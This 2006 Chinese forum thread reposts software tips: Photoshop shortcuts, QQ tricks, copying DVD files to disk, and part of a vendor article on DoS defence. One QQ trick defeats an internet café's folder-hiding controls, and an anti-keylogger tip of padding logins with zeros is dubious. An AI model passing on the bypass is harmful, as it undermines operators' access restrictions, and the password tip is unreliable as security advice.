华工象棋论坛

标题: [分享]电脑软件操作技巧 [打印本页]

作者: 语苛经历    时间: 2006-10-23 20:53
标题: [分享]电脑软件操作技巧


ADOBE PHOTOSHOP 鲜为人知的75个技巧[酷]
Photoshop之所以在拥有强大功能的同时依然保持了良好的使用性, 很大程度上应该归功于其整齐精练的界面和简单易用的可自定义性( 除了 它大量的工具和命令 )。事实上,Photoshop中拥有大量令人惊异的“隐 藏”功能。无论你用过Photoshop多少年,都会不断发掘出越来越多的东 西。我怀疑会有谁宣称他知道关于Photoshop“所有”的东西( 可能ADOBE 的软件工程师要除外 )。

下面的75个技巧将会帮助你( 无论你是新手还是经验丰富的专家 )掌 握Photoshop的一些“隐藏”功能,以助于更快更有效的完成复杂工作; 或者它们会告诉你一些你以前所不知道的PHTOSHOP的能力!为了您的方便 起见,我们把它们分为八个部分来讲: *界面技巧[↑]

1).你可能知道按Tab键可以隐藏工具箱和浮动面板,同样按Shift+Tab键 可以只隐藏浮动面板( 而保留工具条可见 )。

2).按住Shift键点击浮动面板的标题栏( 最上方的?#123;条 )可以使其吸附 到最近的屏幕边缘。

3).双击浮动面板的上的每一栏( 就是有标题的那个 )可以使其最小化。 通过浮动面板上的最小化按钮可以在紧凑模式( 只有最少的选项和内容可 视 )和正常模式( 显示面板上所有的选项和内容 )之间切换。

4).可以通过按回车键( 或双击工具箱上的工具按钮 )来打开当前工具的 选项面板。不然的话只能通过菜单上的 Window/Show Options 命令来来 打开。

5).利用比例缩放区( 在Photoshop窗体或导航器面板的左下角 )来快速 选择一个准确的显示比例,当输入一个值后按Shift+Enter可允构钸巳?保持在比例缩放区。

6).要改变状态区的显示信息( 在窗口底部,默认显示文件大小,可以通 过Window/Show Status Bar打开 ),按状态区上的按钮从弹出菜单中选 一个新的项目。点击状态区上按钮的左侧区域可以显示当前文件的打印尺 寸、按住Alt点击显示文件尺寸和分辨率、按住Ctrl点击显示拼贴信息。

7).厌倦了灰色的画布底色?选择油漆桶工具[K]( Paint Bucket )按住 Shift点击画布边缘即可设置画布底色为当前的前景色。(注意:要还原 到默认的颜色,设置前景色为25%灰度( R192,G192,B192 )再次按住Shift 点击画布边缘。)

8).在Photoshop中所有的对话框中的取消( Cancel )按钮都可以通过按 住Alt键变为复位( Reset )按钮。这使你可以轻易回复到初始值而毋须取 消重来。

9).键盘上的CapsLock键可以控制光标在精确状态及标准状态之间切换。 注意:如果Photoshop的参数 [Ctrl+K,Ctrl+3] ( File/Preferences/ Display & Cursors... ) 中已经设置光标为精确状态,这时CapsLock键 不起作用。

10).按“F”键可在Photoshop的三种不同屏幕显示方式 ( 标准显示模式→ 带菜单的全屏显示模式→全屏显示模式 )下切换( 或者可以使用工具箱下 端的按钮 )。提示:在全屏模式下按Shift+F可以切换是否显示菜单。 双击Photoshop的背景空白处为打开文件命令[Ctrl+O]( File/Open)。

11).按住Shift点击颜色面板下的颜色条可以改变其所显示的色谱类型。 或者,也可以在颜色条上单击鼠标右键,从弹出的颜色条选项菜单中选取 其它色彩模式。

12).在图片窗口的标题栏上单击鼠标右键可以快速?#123;用一些命令,如画布 大小命令、图像大小命令和复制等等。 在?#123;色板面板上的任一空白( 灰色 )区域单击可在?#123;色板上加进一个 自定义的颜色,按住Ctrl键点击为减去一个颜色,按住Shift点击为替换 一个颜色。

13).通过拷贝粘贴Photoshop拾色器中所显示的16进制颜色值,可以在 Photoshop和其它程序( 其它支持16进制颜色值的程序 )之间交换颜色数据。

*工具技巧[↑]

14).要使用画笔工具画出直线,首先在图片上点击,然后移动鼠标到另一 点上按住Shift再次点击图片,Photoshop就会使用当前的绘图工具在两点 间画一条直线。

15).任何时候按住Ctrl键即可切换为移动工具[V],按住Ctrl+Alt键拖动 鼠标可以复制当前层或选区内容。

16).按住空格键可以在任何时候切换为抓手工具[H]( Hand Tool )。

17).缩放工具的快捷键为“Z”,此外Ctrl+空格键为放大工具,Alt+空 格键为缩小工具。

18).按Ctrl+“+”键以及“-”键分别为放大和缩小图像的视图;相对应 的,按以上热键的同时按住Alt键可以自动?#123;整窗口以满屏显示( Ctrl+Alt+ “+”和Ctrl+Alt+“-” ),这一点十分有用!(注意:如果想要在使用 缩放工具时按图片的大小自动?#123;整窗口,可以在缩放工具的选项中选中“ ?#123;整窗口大小以满屏显示( Resize Windows to Fit )”选项。)

19).用吸管工具选取颜色的时候按住Alt键即可定义当前背景色。

20).结合颜色取样器工具[Shift+I]( Color Sampler Tool )和信息面板 ( Window/Show Info ),我们可以监视当前图片的颜色变化。变化前后 的颜色值显示在信息面板上其取样点编号的旁边。通过信息面板上的弹出 菜单可以定义取样点的色彩模式。要增加新取样点只需在画布上随便什么 地方再点一下( 用颜色取样器工具 ),按住Alt键点击可以除去取样点。 注意:一张图上最多只能放置四个颜色取样点 提示:当Photoshop中有对话框( 例如:色阶命令、曲线命令等等 )弹出 时,要增加新的取样点必须按住Shift键再点击,按住Alt+Shift点击一个 取样点可以减去它。

21).度量工具( Measure Tool )在测量距离上十分便利( 特别是在斜 线上 ),你同样可以用它来量角度( 就像一只量角器 )。首先要保证信息 面板[F8] ( Window/Show Info )可视。选择度量工具点击并拖出一 条直线,按住Alt键从第一条线的节点上再拖出第二条直线,这样两条线 间的夹角和线的长度都显示在

*命令技巧[↑]

22).要再次使用刚用过的滤镜,从菜单中选Filter/Last Filter [Ctrl+F];要用新的选项使用刚用过的滤镜记着多加一个Alt键( Ctrl+Alt+F or Alt + Filter/Last Filter )。 提示:要退去上次用过的滤镜或?#123;整的效果( 或改变合成的模式 ),按 Ctrl+Shift+F ( Filter ? Fade Filter )。

23).如果你最近拷贝了一张图片存在剪贴板里,Photoshop在新建文件[Ctrl+N] ( File/New... )的时候会以剪贴板中图片的尺寸作为新建图的默认大小。 要略过这个特性而使用上一次的设置,在打开的时候按住Alt键[Ctrl+Alt+N] ( Alt + File ?New... )。

24).按Ctrl+Alt+Z和Ctrl+Shift+Z组合键分别为在历史记录中向后和向前 ( 或者可以使用历史面板中的菜单来使用这些命令 )。结合还原[Ctrl+Z] ( Edit/Undo )命令使用这些热键可以自由地在历史记录和当前状态中切 换。

25).Alt+Backspace和Ctrl+Backspace组合键分别为填充前景色和背景色, 另一个非常有用的热键是Shift+Backspace––打开填充对话框。 提示:按Alt+Shift+Backspace及Ctrl+Shift+Backspace组合键在填充前 景及背景色的时候只填充已存在的像素( 保持透明区域 )。

作者: 语苛经历    时间: 2006-10-23 21:01


26).在使用自由变换工具[Ctrl+T] ( Edit/Free TransFORM )时按住Alt 键( Ctrl+Alt+T 或 Alt + Edit/Free TransFORM )即可先复制原图层( 在当前的选区 )后在复制层上进行变换。 提示:Ctrl+Shift+T ( Edit/TransFORM ? Again )为再次执行上次的变 换,Ctrl+Alt+Shift+T( Alt + Edit/TransFORM/Again )为复制原图后 再执行变换。

27).要防止使用裁切工具[C]( Crop Tool )时选框吸附在图片边框上,在 拖动裁切工具选框上的控制点的时候按住Ctrl键即可。

28).要修正倾斜的图像,先用测量工具在图上可以作为水平或垂直方 向基准的地方画一条线( 像图像的边框、门框、两眼间的水平线等等 ), 然后从菜单中选Image/Rotate Canvas/Arbitrary,打开后会发现正确 的旋转角度已经自动填好了,只要按确定就OK啦。 注意:也可以用裁切工具来一步完成旋转和剪切的工作:先用裁切工具 [C]画一个方框,拖动选框上的控制点来?#123;整选取框的角度和大小,最后 按回车实现旋转及剪切。提示:测量工具量出的角度同时也会自动填到数 字变换工具( Edit/TransFORM/Numeric )对话框中。

29).使用“通过复制新建层[Ctrl+J] ( Layer/New/Layer Via Copy )” 或“通过剪切新建层[Ctrl+J] ( Layer/New/Layer Via Cut )”命令可 以在一步之间完成拷贝 & 粘贴和剪切 & 粘贴的工作。 注意:通过复制( 剪切 )新建层命令粘贴时被仍放在它们原来的地方,然 而通过拷贝( 剪切 )&粘贴会贴到图片( 或选区 )的中心。

30).裁剪图像( 使用裁剪工具或选Edit/Crop )后所有在裁剪范围之外的 像素就都丢失了。要想无损失地裁剪可以用“画布大小( Image/Canvas Size )”命令来代替。虽然Photoshop会警告你将进行一些剪切,但出于 某种原因事实上并没有––所有“被剪切掉的”数据都被保留在画面以外。 提示:ImageReady的剪切命令( Image/Crop )会提问要删除剪切区域还 是隐藏起来。注意:这对索引色模式不起作用( 在索引模式下用画布大小 命令会损失画面以外的像素 )。

31).合并可见图层时按住Alt键[Ctrl+Alt+Shift+E] ( Alt + Layer/ Merge Visible )为把所有可见图层复制一份后合并到当前图层。 提示:同样可以在合并图层( Layer/Merge Down )的时候按住Alt键,会 把当前层复制一份后合并到前一个层。这个命令没有相应的热键–– Ctrl+Alt+E不起作用。

*选择技巧:[↑]

32).使用选框工具[M]( Marquee Tools )的时候,按住Shift键可以划出 正方形和正圆的选区;按住Alt键将从起始点为中心勾划选区。

33).使用“重新选择”命令[Ctrl+Shift+D] ( Select/Reselect )来载 入/恢复之前的选区。

34).在使用套索工具勾画选区的的时候按Alt键可以在套索工具和和多边 形套索工具间切换。

35).勾画选区的时候按住空格键可以移动正在勾画的选区。

36).众所周知按住Shift或Alt键可以增加或修剪当前选区,但你是否知道 同时按下Shift和Alt键勾画可以选取两个选区中相交的部分呢? 提示:按住Ctrl键点击层的图标( 在层面板上 )可加载它的透明信道,再 按住Ctrl+Alt+Shift键点击另一层为选取两个层的透明信道相交的区域。

37).在缩放或复制图片之间先切换到快速蒙板模式[Q]可保留原来的选区。

38).使用层的技巧[↑]

39).按Shift+“+”键( 向前 )和Shift+“-”键( 向后 )可在各种层的 合成模式上切换。我们还可以按Alt+Shift+“某一字符”快速切换合成模式。

N = 正常 ( Normal )

I = 溶解 ( Dissolve )

M = 正片叠底 ( Multiply )

S = 屏幕 ( Screen )

O = 叠加 ( Overlay )

F = 柔光( Soft Light )

H = 强光( Hard Light )

D = 颜色减淡 ( Color Dodge )

B = 颜色加深 ( Color Burn )

K = 变暗 ( Darken )

G = 变亮 ( Lighten )

E = 差值( Difference )

X = 排除 ( Exclusion )

U = 色相 ( Hue )

T = 饱和度 ( Saturation )

C = 颜色 ( Color )

Y = 亮度( Luminosity )

Q = 背后( Behind 1 )

L = 阈值( Threshold 2 )

R = 清除 ( Clear 3 )

W = 暗?#123;( Shadows 4 )

V = 中间?#123;( Midtones 4 )

Z = 高光( Highlights 4 )

有编号的对以下情况有效:[注1]

仅在“保留透明区域”关闭的图层中工作

索引色模式( Indexed Mode )

多图层图片上用直线[N]( Line )和油漆桶[K]工具 ( Bucket Tools )

减淡和加深工具[O]( Dodge and Burn Tools )

40).直接按底宙I即可改变当前工具或图层的不透明度。按“1”表示10% 不透明度,“5”为50%,以此类推,“0”为100%不透明度。连续按数字 键比如“85”表示不透明度为85%。 注意:以上热键同样对当前的绘图类工具有效,所以如果你要改变当前层 的不透明度,先转到移动工具或某一选取工具。

41).按住Alt点击所需层前眼睛图标可隐藏/显现其它所有图层。

42).按住Alt点击当前层前的笔刷图标可解除其与其它所有层的链接。

43).要清除某个层上所有的层效果,按住Alt键双击该层上的层效果图标; 或者在菜单中选Layer/Effects/Clear Effects。 提示:要关掉其中一个效果,按住Alt键然后在Layer/Effects子菜单中 选中它的名字。或者可以在图层效果对话框中取消它的“应用”标记。

44).在层面板中按住Alt键在两层之间点击可把他们编为一组。当一些层 链接在一些而你又只想把它们中的一部分编组时这个功能十分好用( 因为 编组命令[Ctrl+G] ( Layer/Group with Previous )在当前层与其它层 有链接时会转为编组链接层命令[Ctrl+G] ( Layer/Group Linked ) )。

45).这里有一个节省时间的增加?#123;整层( Layer/New/Adjustment Layer) 的方法:只需按住Ctrl点击“创建新图层“图标( 在层面板的底部 )选择 你想加的?#123;整层类型!


作者: 语苛经历    时间: 2006-10-23 21:02


46).按Alt键点击删除按钮( 在层面板的底部 )可以快速删除层( 无须确 认 ),同样这也适用于信道和路径。 除了在信道面板中编辑层蒙板以外,按Alt点击层面板上蒙板的图标 可以打开它;按住Shift键点击蒙板图标为关闭/打开蒙板( 会显示一个红 叉X表示关闭蒙板 )。按住Alt+Shift点击层蒙板可以以红宝石色( 50%红 ) 显示。按住Ctrl键点击蒙板图标为加载它的透明选区。

47).按层面板上的“添加图层蒙板”图标( 在层面板的底部 )所加入的蒙 板默认显示当前选区的所有内容( Layer/Add Layer Mask/Reveal All ); 按住Alt键点“添加图层蒙板”图标所加的蒙板隐藏当前选区内容( Layer /Add Layer Mask/Hide All )。

48).点击路径面板上的空白区域可关闭所有路径的显示 提示:按Ctrl+Shift+H切换路径是否显示( View ? Show/Hide Path )。

49).在点击路径面板下方的几个按钮( 用前景色填充路径、用前景色描边 路径、将路径作为选区加载 )时,按住Alt键可以看见一系列可用的工具 和/或选项。当前工具为移动工具( 或随时按住Ctrl键 )时,右键点击画 布可以打开当前点所有层的列表( 按从上到下排序 ):从列表中选择层的 名字可以使其为当前层。 提示:按住Alt键点鼠标右键可以自动选择当前点最靠上的层,或者打开

50).移动工具选项面板中的自动选择图层选项也可实现。 提示:再按住Shift键( Alt+Shift+右键点击 )可以切换当前层是否与最上面层作链接。

51).辅助线和标尺的技巧[↑]

52).拖动辅助线时按住Alt键可以在水平辅助线和垂直辅助线之间切换。 按住Alt键点击一条已经存在的垂直辅助线可以把它转为水平辅助线,反之亦然。

53).注意:辅助线是通过从标尺中拖出而建立的,所以要确保标尺是打开 的[Ctrl+R] ( View/Show Rulers )。

54).拖动辅助线时按住Shift键将强制其对齐到标尺上的刻度。

55).双击辅助线可以打开辅助线 & 风格参数设置对话框[Ctrl+K, Ctrl+6] ( File/Preferences/Guides & Grid)。

56).双击标尺[Ctrl+R]可以打开单位 & 标尺参数设置对话框[Ctrl+K, Ctrl +5] ( File/Preferences/Units & Rulers)。 提示:也可以在信息面板上的选项菜单中选择标尺度量单位。

57).标尺的坐标原点可以设置在画布的任何地方,只要从标尺的左上角开 始拖动即可应用新的坐标原点;双击左上角可以还原坐标原点到默认点。

58).利用路径工具创建曲线和斜线的辅助线也不失为一个好办法。只要用 钢笔工具描绘路径即可在绘制上或上色时作为辅助线( 路径始终保持可视 )。提示:使用隐藏路径命令[Ctrl+Shift+H] ( View ? Hide Path )切换路 径显示与否。

59).辅助线不仅会吸附在当前层或选区的边缘( 上下左右 ),而且会也以 ( 当前层或选区的 )水平或垂直中心对齐。反过来也一样:同样选区和层 也会吸附到已经存在的辅助线上( 边缘和中心 )。 注意:辅助线不会吸附到背景层上。而且要实现上述功能先要打开“贴紧 辅助线” [Ctrl+Shift+ ; ] ( View/Snap To Guides )选项。 提示:要找到画面的中心可以新建并[Ctrl+Shift+N] ( Layer/New Layer) 并填充 [Shift+Backspace] ( Edit/Fill)一个层然后把辅助线吸附到垂 直中心和水平中心上。

60).导航器和动作的技巧[注1][↑]

很多时候用键盘来控制导航器( navigation )比用鼠标更快捷。这里 列出了一些常用的导航器热键:

Home = 到画布的左上角

End = 到画布的右下角

PageUp = 把画布向上滚动动一页

PageDown = 把画布向下滚动动一页

Ctrl+PageUp = 把画布向左滚动动一页

Ctrl+PageDown = 把画布向右滚动动一页

Shift+PageUp = 把画布向上滚动10个像素

Shift+PageDown = 把画布向下滚动10个像素

Ctrl+Shift+PageUp = 把画布向左滚动10个像素

Ctrl+Shift+PageDown = 把画布向右滚动10个像素

61).使用Ctrl+Tab/Ctrl+F6在多个文档中切换( 或者也可以使用Window 菜单 ),十分方便!

62).用恢复命令[F12] ( File/Revert )以把当前文档恢复到上次保存时 的状态。警告!在Photoshop5.0中,恢复命令会同时清空历史记录!这意 味着一旦使用恢复命令上次保存后所有的改动都会丢失!Photoshop5.5更 正了这一点。

63).CHANNEL也有其默认对应的热键。这对于存为信道形式的选区/蒙板之间 作加、减和相交运算就变得十分快捷和简单。这里列出了一些常用模式:

RGB颜色 CMYK颜色 索引颜色

Ctrl+“~”= RGB

Ctrl+1 = 红

Ctrl+2 = 绿

Ctrl+3 = ?#123;

Ctrl+4 = 其它信道

Ctrl+9 =其它信道

Ctrl+“~” = CMYK

Ctrl+1 = 青色

Ctrl+2 = 洋红

Ctrl+3 = 黄色

Ctrl+4 = 黑色

Ctrl+5 = 其它信道

Ctrl+9 =其它信道

Ctrl+1 = 索引

Ctrl+2 = 其它信道

Ctrl+9 =其它信道

例如:要创建一个选区以表示信道7和信道9的相交部分,先按Ctrl+Alt+7 ( 把信道7加载为选区 )然后按by Ctrl+Alt+Shift+9( 再和信道9相交 )。

64).按住Ctrl键在导航器的代理预览区域中拖放可以更新设定当前文文件的 可视区域。提示:在代理预览区域中拖动显示框时按住Shift键可以锁定 移动的方向为横向或垂直。提示:在导航器面板的面板选项中可以更改代 理预览区域中显示框的颜色。

65).若只想执行动作( Action )中的单一步骤,选好要执行的步骤然后按 住Ctrl键点播放( Play )按钮( 在行为面板的底部 )。 注意:若要改变动作中部分命令的参数,双击相应的步骤以打开相关对话 框:任何新填入的数值都将自动存储。

66).要从动作的某一步开始执行,只要选好开始的步骤然后按播放按钮 ( 在行为面板的底部 )即可。

67).复制的技巧[↑]

68).可以用选框工具[M]( Marquee Tool )或套索工具[L] ( Polygonal Lasso ),把选区从一个文档拖到另一个上。 把选择区域或层从一个文档拖向另一个时,按住Shift键可以使其在 目的文檔的上居中。 提示:如果源文檔和目的文檔的大小( 尺寸 )相同,被拖动的元素会被放 置在与源文文件位置相同的地方( 而不是放在画布的中心 )。 注意:如果目的文档包含选区,所拖动的元素会被放置在选区的中心。

69).当要在不同文档间移动多个层时,首先把它们链接起来,然后就可以 利用移动工具在文档间同时拖动多个层了。 注意:不能在层面板中同时拖动多个层到另一个文档( 即使它们是链接起 来的 )––这只会移动所选的层。

作者: 语苛经历    时间: 2006-10-23 21:03


70).要把多个层编排为一个组,最快速的方法是先把它们链接起来,然后 选择编组链接图层命令[Ctrl+G] ( Layer/Group Linked )。之后可以按 自己的意愿取消链接。 注意:用这个技术同样可以用来合并[Ctrl+E] ( Layer/Merge Down )多 个可见层( 因为当前层与其它层有链接时“与前一层编组( Group with previous )命令”会变成“编组链接图层( Group Linked )”命令 )。

71).有一个聪明的方法可以同时重新排列多个层( 在层面板里 ):先把所 要的层链接Group [Ctrl+G] ( Layer/Group with Previous )起来,在 层面板中拖到一个新的地方再取消编组。

72).要为当前历史状态或快照( Window/Show History )建立一个复制文 檔可以:

a ) 点击“从当前状态创建新文文件( New Document )”按钮

b ) 从历史面板菜单中选择新文档

c ) 拖动当前状态( 或快照 )到“从当前状态创建新文文件”按钮上

d ) 右键点击所要的状态( 或快照 )从弹出菜单中选择新文档

73).把历史状态中当前图片的某一历史状态拖到另一个图片的窗口可改变 目的图片的内容。

74).按住Alt键点击任一历史状态( 除了当前的、最近的状态 )可以复制 它。而后被复制的状态就变为当前( 最近的 )状态。

75).按住Alt拖动动作中的步骤可以把它复制到另一个动作中。
[此贴子已经被作者于2006-10-23 21:10:31编辑过]

作者: 语苛经历    时间: 2006-10-23 21:11


QQ 10条最酷的秘技

QQ是大家使用最为广泛的一个聊天工具,我想有很多人连做梦都想成为QQ高手吧?也许有人会认为“QQ高手不就是那种对QQ基本功能操作很熟练的人吗?”大错特错!对“高手”的标准实在太低了吧,相信就算是“菜鸟”也能几天就搞定的。但是,要是你掌握一些非常特殊的绝技,呵呵,那你一定可以在朋友面前炫一把,让大家对你刮目相看了,地位自然也是一日千里地上升为真正的QQ高手。废话不多说了,下面让我赶紧告诉你这10条最酷的秘技吧!

灵验的登录方法

相信大家或多或少都有过这样的体验,登录QQ时,小企鹅在屏幕上徒劳地闪动半天之后,弹出来的却是服务器太忙无法登录或者超时的提示框,接连试几次都是这样的,真的有点烦人。别着急,用下面的方法一定能让你顺利登录上去的。
先说第一种方法。如果你使用的是默认登录面板登录的话,那么你可以改用“注册向导”试试,一般情况下都能成功。还不管用的话,就得使用更绝的第二种方法了——打开多个QQ窗口来同时登录同一个号码。我遇到上述情况就会同时打开三个窗口,这里面肯定会有一个能登录上去的,百试不爽。不过也有一种情况是例外的,那就是:网络断线的时候

快速定位好友

现在在一个QQ里加有好几百号人是不足为奇的事,但是Q友多了也会给自己添麻烦的哟!想想看,要在这么一大堆人里找到某某MM可不是件容易的事。怎么办?跟我做吧!首先激活QQ面板,切换到某某MM所在的组,然后在键盘上按下好友昵称的首字母(如“Vc水手”取首字母“V”,而“维C水手”取拼音“wei”的首字母“W”就定位到了一组以此字母为昵称首字母的好友了,现在找起人来方便了许多吧!

回到好友列表顶端
当你在QQ某个组中按了向下按钮又想回到列表顶端时,你没有必要再去按那个向上按钮了。有一个化繁为简的方法是:试着与其他任何一个组之间切换一下,再回到原先的组看一看,呵呵,奇迹出现了,你又回到顶端了。

打造个性的资料
你有没有发现有些人QQ资料填得很特别很有个性呢?比如“国家/地区”填的根本不是下拉列表中的内容,甚至可以换成一个贴图,你会觉得不可思议吧?其实你也完全可以拥有这么个性的资料的。实现方法很简单,在填写资料时你可以不理会那些下拉列表,直接填入你想填的内容即可(贴图可以到专门的网站去Copy)。但请注意并不是所有下拉列表都是形同虚设的,有些内容必须择其一才能填入。

让头像伤心前排
想更多地吸引MM对你的注意吗?那你在她的列表中的位置可一定要排得伤心前一些哟!要不然人家可能会看不到你或者对你视而不见……用不着生气,想个法子让自己排得伤心前些不就行了吗!好,为了帮你实现“企图”,这一招我教定你了。Follow me,打开“个人设定”窗口,然后在自己的昵称前点一下鼠标,再按空格键插入一两个空格(不能太多了,要不然昵称就不能完整显示了),然后点击“修改”按钮进行修改。这样,以后当对方更新了你的资料或者重新登录时,你的头像就可以排在其列表数一数二的显赫位置了(在线的情况下),现在对方要想不看见你都不可能啦。
同理,想把谁放到你的好友列表顶端,就给他“改名”,在他名字前加一两个空格就行。

把自己加为好友
这一招可是厉害得很,可以让自己的头像出现在本身的列表上,这不仅显得很酷,而且有很实用得功能哦(比如下面一条秘技中就可以用到)!其实最早期的QQ版本中是可以直接把自己加为好友的,但现在的版本都行不通了。但是只要我们肯动手,没有什么能难倒我们的。步骤如下:
首先建议设定到“允许任何人把我列为好友”,然后切换到“黑名单”组,在里面空白处点击右键并选“添加坏人名单”,输入自己的QQ号码(什么?把我自己当成坏人了呀!),接下来再把这个“坏人”拖到“我的好友”组中去,这时会弹出“不能添加自己”的提示,不理会它,直接退出QQ。
再一次用注册向导登录时(注意这里一定要用注册向导!),就可以看见自己的头像已经在列表中了,而且,还可以和“自己”说话呢!

查看隐藏的文件夹
有时我们在网吧上网需要查看某些文件夹,无奈管理软件却把它们给隐藏起来了,怎么也打不开。有了QQ就好办了,你可以利用它来另类地打开这些文件夹。方法是:在机器中打开两个QQ号码甲和乙(如果没有两个号码,可以用注册向导,在自己号码前加一个“0”登录,登录后显示号码为“0xxxxxxx”),用左键在甲中点击乙的头像并选择“传送文件”,接着随便在电脑中找个小一些的文件进行传送,由乙来接收,很快就会接收完毕,弹出了一个很关键的窗口,提示“文件接收完毕,是否转到文件所在目录?”,这时请一定点击“是”按钮。
嘿嘿,现在可以随心所欲地查看该文件夹了吧!

与不喜欢的人“永别”
俗话说“林子大了,什么鸟都有”,在用QQ聊天时我们也会有碰到“坏鸟”的。你把对方删除掉也不见得能得到清净,他(她)还是可以在陌生人里喋喋不休地骚扰你。隐患就在于你的头像还保留在对方的列表里。所以我要提醒你,以后遇到这样的情况一定不能手软,就一定要毫不犹豫地把“坏鸟”拖入“黑名单”中。这样,双方都会彻底地从对方列表中消失了,也就没有人能烦到你了。当然如果对方已经赖在“陌生人”里了也还有补救措施,很简单,同样把这个人拖入“黑名单”就行了。

让数据重见天日
作为在网吧使用QQ的用户,由于经常“行踪不定”,学会QQ数据的备份与恢复是很重要的。如果只要备份QQ消息数据(包括聊天记录、用户信息以及系统消息等)可以直接用“消息管理器”来实现。操作很简单,我就不多说了。如果要备份全部的数据信息(还包括用户信息、分组信息、好友列表等),你就应该找到一个以你的QQ号码命名的用户目录文件夹(默认路径在C:\Program Files\Tencent下),把它备份就可以了。这些备份数据一般都不大,你完全可以压缩后把它作为附件发送到E-mail里,下次在别处使用QQ时再下载过来,然后通过“消息管理器”把消息数据导入或者用目录文件覆盖同名目录(注意之前要先登录一次,退出后覆盖),这样就大功告成,你的数据资料又奇迹般地回来了!

简单有效的防黑术
现在网上(特别是网吧)盗取QQ密码的方法层出不穷,搞得QQ用户人人自危。有一种通过监视来获得密码的工具更是防不胜防,它一般在本地机器中隐藏运行,会自动记录那些号码位数不超过9位的QQ登录密码,甚至还可以自动把这些密码发送到指定的邮箱。基于它的原理,我们就可以采取对应的防黑措施了。具体做法是:在登录的时候,在号码前加入一串的“0”(比如20个),我们会发现这并不影响正常的登录,但是你在本地机器上的号码却变成了一大串的“0”。这样一来,再聪明的监视盗号工具也会对这种长号码不理不睬了,当然你也就不必担心QQ密码泄露了
"轻用其芒,动即有伤,是为凶器;深藏若拙,临机取决,是为利器。HK不是从真正意义上的去黑,而是挑战自己,挑战困难,坚毅,执著,智慧……"
作者: 语苛经历    时间: 2006-10-23 21:12


把DVD影片拷贝到硬盘上观看

早在VCD格式光盘流行的年代,电脑爱好者们就经常将光盘中Mpegav目录下的影音文件直接拷贝到硬盘上,然后再进行影片的播放,以此来减少光驱的耗损。虽然DVD影片光盘在制定标准时就考虑到要通过技术措施来防止拷贝,但DeCSS软件的出现使得其保护措施形同虚设,因此我们现在见到的绝大多数DVD影片光盘中的文件都是可以直接进行拷贝的。与此同时,电脑上DVD光驱的普及率越来越高,其数据读取速度已经高达16倍速(21MB/s),而硬盘的容量也越来越大,80GB已经成为了标准配置,这一切都为我们将DVD影片拷贝到硬盘上播放提供了很好的条件。

但是,由于DVD影片光盘需要实现一些诸如多语言多字幕之类的新功能,像VCD光盘那样单纯拷贝影音文件的方法看起来已经不再适用了。为了能够在硬盘上播放DVD影片,有人提出了使用虚拟光驱软件将DVD影片光盘生成映像文件,然后再通过虚拟光驱进行播放的方法。而事实上,基于对DVD影片文件本身特征的了解,我们完全没有必要如此大费周章。下面我来给大家介绍一下将DVD影片拷贝到硬盘上播放的原理和方法。

首先让我们来看一下DVD影片光盘的文件结构。通常情况下,光盘上会有两个文件夹:Audio_ts和Video_ts:由于Audio_ts是保留给DVD版的激光唱片DVD-AUDIO使用的,所以在DVD影片光盘中,这个文件夹是空的;而Video_ts中则保存着影片所有的视频音频和字幕信息。因此我们只需要把这个文件夹拷贝到硬盘上就可以了,而且拷贝后文件夹的名字也可以根据需要进行随意更改。

接下来我们来看一下这个拷贝过来的文件夹中都包含有哪些文件。依照DVD影片光盘(DVD-VIDEO)标准的规定,一个标准的Video_ts文件夹中应该包含三种类型的文件:VOB、IFO、BUP,下面我们再来分别看一下它们各自的作用。

VOB(Video OBjects视频目标文件):VOB文件用来保存DVD影片中的视频数据流、音频数据流、多语言字幕数据流以及供菜单和按钮使用的画面数据。由于一个VOB文件中最多可以保存1个视频数据流、9个音频数据流和32个字幕数据流,所以DVD影片也就可以拥有最多9种语言的伴音和32种语言的字幕。

IFO(InFOrmation信息文件):IFO文件用来控制VOB文件的播放。文件中保存有怎样以及何时播放VOB文件中数据的控制信息,比如段落的起始时间、音频数据流的位置、字幕数据流的位置等信息。DVD机或者播放软件通过读取IFO文件,才能把组成DVD影片的各种数据有机地结合起来进行播放。

BUP(BackUP备份文件):BUP文件和IFO文件的内容完全相同,是IFO文件的备份。由于IFO文件对于保证影片的正常播放非常重要,所以需要保留一个副本,以备在IFO文件的读取发生错误时仍然可以通过读取BUP文件来得到相应的信息。

通过以上的介绍我们可以看出,只要使播放软件读取IFO文件就可以达到控制DVD影片中所有功能的目的。那么如何实现呢?实际上非常简单,我们广泛使用的DVD播放软件PowerDVD XP 4.0本身就已经提供了这一功能:启动PowerDVD XP 4.0后按下组合键Ctrl-o或者用鼠标单击播放控制面板上的“选择源文件”按钮,然后点选“打开硬盘上的DVD文件”菜单项,接着在弹出的对话框中选择已经拷贝在硬盘上的Video_ts文件夹中的*.IFO文件,就可以像播放光盘中的DVD影片一样使用语言选择、字幕选择等所有的控制功能了,与在DVD光驱中直接播放别无二致。
作者: 语苛经历    时间: 2006-10-23 21:13



作者: 语苛经历    时间: 2006-10-23 21:14



作者: 语苛经历    时间: 2006-10-23 21:15


建立全局的安全体系 防范“拒绝服务(DOS)”攻击


尽管多年来全球无数网络安全专家都在着力开发DoS攻击的解决办法,但到目前为止收效不大,这是因为DoS攻击利用了TCP协议本身的弱点。DoS攻击使用相对简单的攻击方法,可以使目标系统完全瘫痪,甚至破坏整个网络。因此Extreme Networks认为,只有从网络的全局着眼,在网间基础设施的各个层面上采取应对措施,包括在局域网层面上采用特殊措施,及在网络传输层面上进行必要的安全设置,并安装专门的DoS识别和预防工具,才能最大限度地减少DoS攻击所造成的损失。

建立这样一个全面系统的网络安全体系,网络的基础架构必须是以三层交换和路由为核心的智能型网络,并在此基础上,提供完善的三层以上的安全策略管理工具,并提供对专业的安全管理软件支持的能力。Extreme Networks 一直是三层及多层交换技术的领导者,在为用户提供强大的带宽和速度的同时,也具备一套非常完善的网络管理工具,特别是针对DoS最难以解决的流量型攻击,Extreme Ware管理套件提供了有效的识别机制和强硬的控制手段。

将最先进的三层交换技术和多层安全防范体系结合起来,是认真考虑抵抗DoS攻击的用户的最佳选择。而且在进行网络的设计阶段,就应该从局域网层面和网络传输层面进行合理的布置。

局域网层面问题

在局域网层面上,系统管理员可以采取大量的预防措施,防止DoS攻击带来的服务不能效应。这些预防措施包括:保持坚实的整体管理和安全程序,针对各类DoS攻击,实施特定的防卫措施等等。与特定DoS攻击类型有关的其它方法可以包括:关闭或限制可能被损坏或暗中破坏的特定服务。遗憾的是,这些限制措施还必须与其可能给合法应用(如采用UDP作为传输机制的 Real Audio) 带来的影响进行权衡。如果攻击者能够胁迫受害人不使用有益的

IP服务或合法应用,那么在一定程度上,这些黑客已经达到了自己的目标。

网络传输层问题

